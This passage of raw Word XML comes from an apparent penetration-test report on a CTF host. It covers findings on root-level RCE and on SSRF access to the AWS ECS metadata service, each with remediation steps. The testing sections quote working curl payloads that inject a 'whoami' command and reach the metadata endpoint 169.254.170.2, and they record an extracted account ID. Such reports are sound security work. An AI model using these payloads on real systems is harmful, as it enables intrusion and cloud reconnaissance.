      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Group=appgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040DEE9" w14:textId="77777777" w:rsidR="00B15ED9" w:rsidRDefault="00B15ED9" w:rsidP="00B15ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure the application user has only the minimum permissions required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B473ED" w14:textId="77777777" w:rsidR="00B15ED9" w:rsidRDefault="00B15ED9" w:rsidP="00B15ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement proper file system permissions and ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF9512" w14:textId="5FA7A992" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00B15ED9" w:rsidP="00B15ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use containers or sandboxing technologies to further isolate the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C67867" w14:textId="77777777" w:rsidR="00427D0A" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3430502E" w14:textId="77777777" w:rsidR="00E50383" w:rsidRDefault="00E50383" w:rsidP="00E50383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leveraged the RCE vulnerability to execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80C376" w14:textId="77777777" w:rsidR="00E50383" w:rsidRDefault="00E50383" w:rsidP="00E50383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed root user: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/pdf -d "url=http://localhost/admin?cmd=whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D75C09" w14:textId="77777777" w:rsidR="00E50383" w:rsidRDefault="00E50383" w:rsidP="00E50383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verified with </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command showing </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F056651" w14:textId="0AF29AC4" w:rsidR="00E50383" w:rsidRPr="008C2BC7" w:rsidRDefault="00E50383" w:rsidP="00E50383">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examined service configuration file showing </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User=root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Group=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E116A61" w14:textId="2D1CEC8B" w:rsidR="00427D0A" w:rsidRDefault="00736B4F" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="284ACC1B" wp14:editId="0297219C">
            <wp:extent cx="5943600" cy="723900"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="95250"/>
            <wp:docPr id="1570520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B39BBB" w14:textId="36E0480C" w:rsidR="00FB2188" w:rsidRDefault="00FB2188" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="272F1D26" wp14:editId="77E8421A">
            <wp:extent cx="5974080" cy="5935980"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="102870"/>
            <wp:docPr id="17604398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59359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16B7B" w14:textId="02F2CFA2" w:rsidR="00FB2188" w:rsidRDefault="00FB2188" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32925C5C" wp14:editId="15DCFCF2">
            <wp:extent cx="5935980" cy="571500"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="95250"/>
            <wp:docPr id="1687163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571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908B57" w14:textId="44FF1069" w:rsidR="00FB2188" w:rsidRDefault="00FB2188" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59E6B760" wp14:editId="5301441B">
            <wp:extent cx="4991100" cy="4213860"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="91440"/>
            <wp:docPr id="11028291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4213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B70B1E" w14:textId="77777777" w:rsidR="002E7780" w:rsidRDefault="002E7780" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715B6180" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0370E6A4" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00736B4F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28654273" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="1F20E37A" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="243A4C3B" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="58659C04" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="410E2EBE" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="7821A737" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="5AC81810" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="1F940889" w14:textId="77777777" w:rsidR="00466334" w:rsidRDefault="00466334" w:rsidP="00466334"/>
    <w:p w14:paraId="3A536741" w14:textId="77777777" w:rsidR="00DF00BC" w:rsidRDefault="00DF00BC" w:rsidP="00466334"/>
    <w:p w14:paraId="1FDA3D8B" w14:textId="51D75610" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="00EA4A3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="006E0044" w:rsidRPr="006E0044">
        <w:t>AWS Metadata Service Access via SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277CBF3" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Risk Rating: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="004527E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="004527E4">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7E393" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Exploitation Likelihood: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="004527E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="004527E4">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D423E05" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Potential Impact: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="004527E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="004527E4">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61520175" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220ED5D3" w14:textId="49284619" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00DB3DFB" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB3DFB">
        <w:t xml:space="preserve">The SSRF vulnerability allows access to AWS ECS metadata endpoints, exposing sensitive cloud infrastructure information. The application running in AWS ECS Fargate exposes container metadata through </w:t>
      </w:r>
      <w:r w:rsidRPr="002118D8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>169.254.170.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB3DFB">
        <w:t>, revealing AWS account details, container ARNs, network configuration, and task definitions. This information can be used for reconnaissance, lateral movement, and potential privilege escalation within the AWS environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DBDD8" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30978D8A" w14:textId="77777777" w:rsidR="000D71D9" w:rsidRDefault="000D71D9" w:rsidP="000D71D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement network-level restrictions to block access to metadata endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411DBCDA" w14:textId="77777777" w:rsidR="000D71D9" w:rsidRDefault="000D71D9" w:rsidP="000D71D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use IMDSv2 (Instance Metadata Service Version 2) which requires session tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2C93E" w14:textId="77777777" w:rsidR="000D71D9" w:rsidRDefault="000D71D9" w:rsidP="000D71D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configure VPC endpoints and security groups to restrict metadata access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F2565" w14:textId="77777777" w:rsidR="000D71D9" w:rsidRDefault="000D71D9" w:rsidP="000D71D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement proper IAM roles with minimal permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD8D82B" w14:textId="53E417AB" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="000D71D9" w:rsidP="000D71D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Monitor and log access to metadata services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9B526" w14:textId="77777777" w:rsidR="008A6460" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091F876" w14:textId="77777777" w:rsidR="00FE414F" w:rsidRDefault="00FE414F" w:rsidP="00FE414F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Discovered ECS metadata endpoints in environment variables through RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF5BCBB" w14:textId="38080229" w:rsidR="00FE414F" w:rsidRDefault="00FE414F" w:rsidP="00FE414F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessed metadata service: </w:t>
      </w:r>
      <w:r w:rsidRPr="008C244A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/pdf -d "url=http://169.254.170.2/v4/</w:t>
      </w:r>
      <w:r w:rsidR="000F36E0" w:rsidRPr="000F36E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F36E0" w:rsidRPr="000F36E0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>80742b63e3154e2c88087bd521e64093-0193386898</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30562122" w14:textId="77777777" w:rsidR="00FE414F" w:rsidRDefault="00FE414F" w:rsidP="00FE414F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Extracted sensitive information including AWS account ID (774605900109)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED29E22" w14:textId="7341EEF7" w:rsidR="00FE414F" w:rsidRDefault="00FE414F" w:rsidP="00FE414F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Retrieved container configuration, network details, and task definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7648BD" w14:textId="6EB13726" w:rsidR="00BE7B5A" w:rsidRDefault="00BE7B5A" w:rsidP="00BE7B5A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C45191" wp14:editId="4BE2638B">
            <wp:extent cx="5937250" cy="584200"/>
            <wp:effectExtent l="95250" t="95250" r="101600" b="101600"/>
            <wp:docPr id="14430866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58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EE0683" w14:textId="2586711B" w:rsidR="007A69C8" w:rsidRPr="008C2BC7" w:rsidRDefault="00EA2593" w:rsidP="007A69C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31ADE563" wp14:editId="5DB8504E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>105508</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1907931</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3947746" cy="155331"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="1996030552" name="Rectangle 45"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3947746" cy="155331"/>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A75CF" id="Rectangle 45" o:spid="_x0000_s1026" style="position:absolute;margin-left:8.3pt;margin-top:150.25pt;width:310.85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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007A69C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52AE2FAF" wp14:editId="3999000D">
            <wp:extent cx="5943600" cy="2178685"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="88265"/>
            <wp:docPr id="1568037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37395" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="21786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8CF419" w14:textId="090F188D" w:rsidR="008A6460" w:rsidRDefault="00457DEA" w:rsidP="00457DEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BAF3703" wp14:editId="59EB5478">
            <wp:extent cx="5935980" cy="647700"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="95250"/>
            <wp:docPr id="893937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647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442022" w14:textId="7D4D1EC0" w:rsidR="00457DEA" w:rsidRDefault="00457DEA" w:rsidP="00457DEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12A19CD2" wp14:editId="38EDBD1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>246634</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1282573</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1853184" cy="131064"/>
                <wp:effectExtent l="19050" t="19050" r="13970" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="47110894" name="Rectangle 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1853184" cy="131064"/>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AD9E5" id="Rectangle 20" o:spid="_x0000_s1026" style="position:absolute;margin-left:19.4pt;margin-top:101pt;width:145.9pt;height:1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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D0E3837" wp14:editId="0C0B66A5">
            <wp:extent cx="5935980" cy="2956560"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="91440"/>
            <wp:docPr id="597887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172579" w14:textId="77777777" w:rsidR="00855C92" w:rsidRDefault="00855C92" w:rsidP="00457DEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3645B6" w14:textId="77777777" w:rsidR="00855C92" w:rsidRDefault="00855C92" w:rsidP="00457DEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBE93A8" w14:textId="77777777" w:rsidR="0027152C" w:rsidRDefault="0027152C" w:rsidP="0027152C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F35431" w14:textId="77777777" w:rsidR="0027152C" w:rsidRDefault="0027152C" w:rsidP="0027152C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D099D58" w14:textId="77777777" w:rsidR="0027152C" w:rsidRPr="008C2BC7" w:rsidRDefault="0027152C" w:rsidP="0027152C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7E9DCA" w14:textId="601C214F" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00BC688B">
        <w:t>Information Disclosure via Exposed Git Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47782B4C" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Risk Rating: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="0027152C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="0027152C">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821D614" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Exploitation Likelihood: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="0027152C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="0027152C">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EA470" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Potential Impact: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="0027152C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="0027152C">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33976176" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
